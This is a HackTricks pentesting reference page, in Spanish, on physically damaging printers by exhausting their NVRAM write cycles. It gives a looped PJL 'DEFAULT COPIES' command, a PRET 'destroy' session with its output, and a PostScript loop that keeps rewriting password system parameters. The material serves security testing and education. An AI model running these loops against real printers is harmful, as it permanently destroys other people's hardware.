hacktricks/network-services-pentesting/pentesting-printers/physical-damage.md

4.5 KiB

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Las configuraciones a largo plazo para impresoras y otros dispositivos integrados se almacenan en memoria no volátil (NVRAM), que tradicionalmente se implementa como EEPROM o como memoria flash. Ambos componentes tienen una vida útil limitada. Hoy en día, los proveedores de memoria flash garantizan alrededor de 100,000 reescrituras antes de que puedan ocurrir errores de escritura.

PJL

Para una prueba práctica de destruir la funcionalidad de escritura de NVRAM, se puede configurar continuamente el valor a largo plazo para el número de copias con diferentes valores para X:

@PJL DEFAULT COPIES=X

Generalmente, antes de dejar de permitir la escritura, los parámetros de NVRAM se fijan al valor predeterminado de fábrica y todas las variables aún podrían cambiarse para el trabajo de impresión actual utilizando el comando @PJL SET....

Usando PRET:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> destroy
Warning: This command tries to cause physical damage to the
printer NVRAM. Use at your own risk. Press CTRL+C to abort.
Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
[... wait for about 24 hours ...]
I'm afraid. I'm afraid, Dave. Dave, my mind is going...
NVRAM died after 543894 cycles, 18:46:11

PostScript

Para PostScript, se necesita encontrar una entrada en el diccionario currentsystemparams que sobreviva a un reinicio (y por lo tanto debe estar almacenada en algún tipo de NVRAM). Un buen candidato sería una contraseña de PostScript.
PostScript puede ejecutar un script que corrompa su propia NVRAM:

/counter 0 def
{ << /Password counter 16 string cvs
/SystemParamsPassword counter 1 add 16 string cvs
>> setsystemparams /counter counter 1 add def
} loop

Más información sobre estas técnicas se puede encontrar en http://hacking-printers.net/wiki/index.php/Physical_damage

Aprende a hackear AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: